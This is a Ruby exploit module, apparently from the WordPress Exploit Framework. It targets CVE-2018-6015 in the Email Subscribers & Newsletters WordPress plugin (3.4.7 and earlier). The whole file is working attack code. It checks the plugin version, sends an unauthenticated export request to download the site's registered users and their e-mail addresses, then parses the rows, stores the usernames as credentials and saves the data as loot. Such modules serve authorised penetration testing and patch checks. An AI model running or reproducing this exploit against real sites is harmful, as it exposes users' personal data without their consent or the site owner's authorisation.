class Wpxf::Auxiliary::EmailSubscribersUserListDisclosure

# Registers the module's metadata with the framework.
#
# The superclass constructor runs first so that the base module state is set
# up before update_info is called; the metadata itself is assembled into a
# local hash and then splatted into update_info.
def initialize
  super

  module_info = {
    name: 'Email Subscribers & Newsletters <= 3.4.7 User List Disclosure',
    desc: %(
      This module exploits a vulnerability in Email Subscribers & Newsletters
      which allows anonymous users to download a list of the registered users
      and the associated e-mail addresses.
    ),
    author: [
      'Threat Press', # Disclosure
      'rastating'     # WPXF module
    ],
    references: [
      ['WPVDB', '9014'],
      ['CVE', '2018-6015'],
      ['URL', 'https://blog.threatpress.com/vulnerability-email-subscribers-plugin/']
    ],
    date: 'Jan 24 2018'
  }

  update_info(**module_info)
end

# Determines whether the target runs a vulnerable plugin version.
#
# Delegates entirely to the framework helper, comparing the version
# advertised in the plugin's readme against 3.4.8 (presumably the first
# patched release, given the `<= 3.4.7` range in the module name).
#
# @return the value returned by check_plugin_version_from_readme
def check
  plugin_slug = 'email-subscribers'
  fixed_version = '3.4.8'
  check_plugin_version_from_readme(plugin_slug, fixed_version)
end
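# Parses the exported CSV body and hands every row to process_row, then
# emits the collected @users table.
#
# The body is the target's own response and is treated as untrusted text:
# only a "blank string to nil" converter is applied. The stdlib `:all`
# converter set is deliberately not used, because it coerces numeric- or
# date-looking fields into Integer/Float/Date objects before they reach
# process_row — a username such as `007` or `0x1f` would be recorded as the
# number 7 or 31 rather than as the string the target returned.
#
# The converter is passed inline instead of being registered in
# CSV::Converters, which is a process-wide registry that the previous
# implementation mutated on every call.
#
# @param body [String] raw CSV text returned by the target
# @param delimiter [String] column separator used by the export
# @return [Boolean] true when the body parsed and the table was emitted,
#   false when the CSV library rejected the input
def parse_csv(body, delimiter)
  # First entry doubles as the header row of the emitted table.
  @users = [{
    username: 'Username', email: 'E-mail'
  }]

  blank_to_nil = ->(field) { field&.empty? ? nil : field }

  rows = CSV.new(
    body,
    col_sep: delimiter,
    headers: true,
    header_converters: :symbol,
    converters: [blank_to_nil]
  )

  # each rather than to_a.map: the mapped values were never used.
  rows.each { |row| process_row(row) }
  emit_table @users
  true
rescue CSV::MalformedCSVError
  # Only the CSV library's own parse failure is a soft failure. The previous
  # `rescue Error` named a constant that neither CSV nor Ruby core defines;
  # unless the enclosing namespace provides one, a parse error would have
  # surfaced as a NameError instead of returning false.
  false
end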
# Records a single exported row.
#
# Rows lacking either the `name` or the `email` column are skipped. Both
# values originate in the target's CSV export and are passed to
# emit_success, store_credentials and the @users table without any
# sanitising or escaping.
#
# @param row [CSV::Row] a parsed row with symbolised headers
# @return [nil, Array] nil for a skipped row, otherwise the updated @users
def process_row(row)
  name = row[:name]
  email = row[:email]
  return unless name && email

  emit_success "Found user: #{name} (#{email})", true
  store_credentials name
  @users << { username: name, email: email }
end
# Requests the registered-user export from the target.
#
# Sends the POST that triggers the export and returns the response only when
# one arrived with HTTP status 200. Any other outcome is reported through
# emit_error and yields nil so that the caller can stop.
#
# @return [Object, nil] the response object on success, otherwise nil
def request_user_list
  response = execute_post_request(
    url: full_uri,
    params: { 'es' => 'export' },
    body: { 'option' => 'registered_user' }
  )

  if response.nil?
    emit_error 'No response from the target'
  elsif response.code != 200
    emit_error "Server responded with code #{response.code}"
  else
    return response
  end

  nil
end
# Drives the module: fetch the export, parse it, and save the raw body as loot.
#
# Stops with false when the superclass run fails or when no usable response
# was obtained. The return value of parse_csv is not checked, so the raw
# body is still exported as loot even if it could not be parsed as CSV.
#
# @return [Boolean] true once the loot file has been written, false otherwise
def run
  return false unless super

  emit_info 'Requesting the user list...'
  response = request_user_list
  return false if response.nil?

  emit_info 'Parsing result...', true
  parse_csv(response.body, ',')

  description = 'Registered users and e-mail addresses'
  loot = export_and_log_loot(response.body, description, 'user list', '.csv')
  emit_success "User list saved to #{loot.path}"

  true
end